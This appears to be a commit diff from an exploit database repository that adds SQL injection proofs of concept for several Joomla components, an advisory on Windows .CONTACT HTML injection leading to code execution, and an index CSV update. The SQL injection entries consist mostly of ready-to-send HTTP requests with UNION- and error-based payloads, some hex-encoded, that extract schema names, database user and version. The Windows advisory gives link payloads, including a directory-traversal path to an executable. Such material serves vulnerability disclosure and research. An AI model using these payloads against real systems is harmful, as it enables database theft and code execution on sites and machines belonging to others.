GET /[PATH]/index.php?option=com_vmap&task=loadmarker&latlngbound=-40.716362432588596,40.71920853699145,-73.983044552948,-73.972959447052%20%4f%72%64%65%72%20%62%79%20%31%32%2d%2d%20%2d&mapid=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 500 XPATH syntax error:...
Date: Tue, 22 Jan 2019 21:16:19 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: False
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked

37
exploits/php/webapps/46230.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Joomla! Component J-BusinessDirectory 4.9.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://cmsjunkie.com/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/j-businessdirectory/
# Version: 4.9.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=[SQL]&term=a
#
GET /[PATH]/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=1%20union%20select%20(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),2--%20-&term=a HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6; PHPSESSID=c1088ee33a3f4770dd333f9605b9e44f; 704a7cf3f453ec2db97de2f28ef169f8=fb9a121113ff0e6cc6da546a82f2452e
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
HTTP/1.1 200 OK
Date: Wed, 23 Jan 2019 15:45:13 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=172800
Expires: Fri, 25 Jan 2019 15:45:13 GMT
Alt-Svc: h2=":443"; ma=60
Server: cloudflare
CF-RAY: 49da034bc2faba72-ATL

44
exploits/php/webapps/46231.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://cmsjunkie.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/j-classifiedsmanager/
# Version: 3.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/component/jclassifiedsmanager/
#
&categorySearch=[SQL]
&adType=[SQL]
&citySearch=[SQL]
POST /[PATH]/component/jclassifiedsmanager/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 779
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
searchKeyword=&categorySearch=&adType=&citySearch=1'%7c%7c%28%53%45%4c%45%43%54%20%27%45%66%65%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45 2%3d%32%20%41%4e%44%20%28%53%45%4c%45%43%54%20%32%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%32%3d%32%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&option=com_jclassifiedsmanager&controller=displayads&task=searchAds&view=displayads: undefined
HTTP/1.1 500 Internal Server Error
Date: Wed, 23 Jan 2019 15:06:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Alt-Svc: h2=":443"; ma=60
Server: cloudflare
CF-RAY: 49d9cb37b64998d7-LAX

43
exploits/php/webapps/46232.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: Joomla! Component J-MultipleHotelReservation 6.0.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://cmsjunkie.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jmultiplehotelreservation/
# Version: 6.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/j-myhotel/search-hotels?view=hotels
#
%31%2d%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%73%65%6c%45%43%74%28%40%78%29%66%52%4f%6d%28%73%65%6c%45%43%74%28%40%78%3a%3d%30%78%30%30%29%2c%28%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%3a%3d%30%29,%28%40%74%62%6c%3a%3d%30%78%30%30%29%2c%28%73%65%6c%45%43%74%28%30%29%66%52%4f%6d%28%69%6e%66%6f%52%4d%41%54%69%6f%6e%5f%73%63%68%45%4d%61%2e%63%6f%4c%55%4d%6e%73%29%77%48%45%72%65%28%74%41%42%4c%65%5f%73%63%68%45%4d%61%3d%64%61%54%41%42%61%73%65%28%29%29%61%4e%64%28%30%78%30%30%29%69%6e%28%40%78%3a%3d%43%6f%6e%63%61%74%28%40%78%2c%69%66%28%28%40%74%62%6c%21%3d%74%41%42%4c%65%5f%6e%61%6d%65%29%2c%43%6f%6e%63%61%74%28%4c%50%41%44%28%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%3a=%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%20%31%2c%32%2c%30%78%33%30%29%2c%30%78%33%30%33%64%33%65%2c%40%74%42%6c%3a%3d%74%41%42%4c%65%5f%6e%61%4d%65%2c%28%40%7a%3a%3d%30%78%30%30%29%29%2c%20%30%78%30%30%29%2c%6c%70%61%64%28%40%7a%3a%3d%40%7a%20%31%2c%32%2c%30%78%33%30%29%2c%30%78%33%64%33%65%2c%30%78%34%62%36%66%36%63%36%66%36%65%33%61%32%30%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2d%2d%20%2d
POST /[PATH]/j-myhotel/search-hotels?view=hotels HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 985
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; PHPSESSID=6c6c795380ae5a25888e1dd57e04320a; c9ffd68b334eb414c880fa254194ecbb=6053bfbb8394c9545ab2169c4399aefc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
controller=search&task=searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=-1 UNION SELECT 1,(selECt(@x)fROm(selECt(@x: =0x00)%2c(@rUNNing_nuMBer
HTTP/1.1 200 OK
Date: Wed, 23 Jan 2019 15:14:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 23 Jan 2019 15:14:32 GMT
Alt-Svc: h2=":443"; ma=60
Server: cloudflare
CF-RAY: 49d9d658025e22c4-LAX

82
exploits/windows/local/46222.txt Normal file
View file

@ -0,0 +1,82 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
[+] ZDI-CAN-7591
[Vendor]
www.microsoft.com
[Product]
Microsoft .CONTACT File
A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista.
This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\.
[Vulnerability Type]
Mailto: HTML Link Injection Remote Code Execution
[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The flaw is due to the processing of ".contact" files, the E-mail address field takes an expected E-mail address value, however the .CONTACT file is
vulnerable to HTML injection as no validation is performed. Therefore, if an attacker references an executable file using an HREF tag it will run that
instead without warning instead of performing the expected email behavior. This is dangerous and would be unexpected to an end user.
The E-mail addresses Mailto: will point to an arbitrary executable like.
<a href="calc.exe">pwn@microsoft.com</a>
Additionally the executable file can live in a sub-directory and be referenced like "<a href="mydir\malicious.exe">pwn@microsoft.com</a>" or attackers can use
directory traversal techniques to point to a malware say sitting in the targets Downloads directory like:
<a href="..\..\..\..\Users\victim\Downloads\evil.exe">pwn@microsoft.com</a>
Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected using certain archive utils.
This advisory was initially one of three different vulnerabilities I reported to Zero Day Initiative Program (ZDI), that microsoft decided to not release a security fix
for and close. The first cases I reported to ZDI were .VCF and .CONTACT files Website address input fields.
This example is yet another vector affecting Windows .CONTACT files and is being released as the .CONTACT file issue is now publicly known.
[Exploit/POC]
Create a Windows .CONTACT file and inject the following HTML into the E-mail: field
<a href="calc.exe">pwn@microsoft.com</a>
Windows will prompt you like "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?"
Click Yes.
Open the .CONTACT file and click the Mailto: link BOOM! Windows calculator will execute.
Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files will also execute! :)
[POC Video URL]
https://vimeo.com/312824315
[Disclosure Timeline]
Reported to ZDI 2018-11-22 (ZDI-CAN-7591)
Another separate vulnerability affecting MS Windows .contact files affected the Website address input fields and was publicly disclosed January 16, 2019.
https://www.zerodayinitiative.com/advisories/ZDI-19-121/
Public disclosure : January 22, 2019
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

12
files_exploits.csv
View file

@ -10239,6 +10239,7 @@ id,file,description,date,author,type,platform,port
46186,exploits/linux/local/46186.rb,"blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)",2019-01-16,Metasploit,local,linux,
46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows,
46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows,
46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40698,3 +40699,14 @@ id,file,description,date,author,type,platform,port
46214,exploits/php/webapps/46214.txt,"PHP Uber-style GeoTracking 1.1 - SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
46217,exploits/php/webapps/46217.txt,"Adianti Framework 5.5.0 - SQL Injection",2019-01-21,"Joner de Mello Assolin",webapps,php,80
46219,exploits/php/webapps/46219.txt,"Joomla! Component Easy Shop 1.2.3 - Local File Inclusion",2019-01-22,"Ihsan Sencan",webapps,php,80
46221,exploits/linux/webapps/46221.py,"Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation",2019-01-23,"Chris Lyne",webapps,linux,
46223,exploits/php/webapps/46223.txt,"Joomla! Component vBizz 1.0.7 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
46224,exploits/php/webapps/46224.txt,"Joomla! Component vBizz 1.0.7 - Remote Code Execution",2019-01-23,"Ihsan Sencan",webapps,php,80
46225,exploits/php/webapps/46225.txt,"Joomla! Component vWishlist 1.0.1 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
46226,exploits/php/webapps/46226.txt,"Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
46227,exploits/php/webapps/46227.txt,"Joomla! Component vReview 1.9.11 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
46228,exploits/php/webapps/46228.txt,"Joomla! Component vRestaurant 1.9.4 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
46229,exploits/php/webapps/46229.txt,"Joomla! Component VMap 1.9.6 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
46230,exploits/php/webapps/46230.txt,"Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80
46231,exploits/php/webapps/46231.txt,"Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,
46232,exploits/php/webapps/46232.txt,"Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80

Can't render this file because it is too large.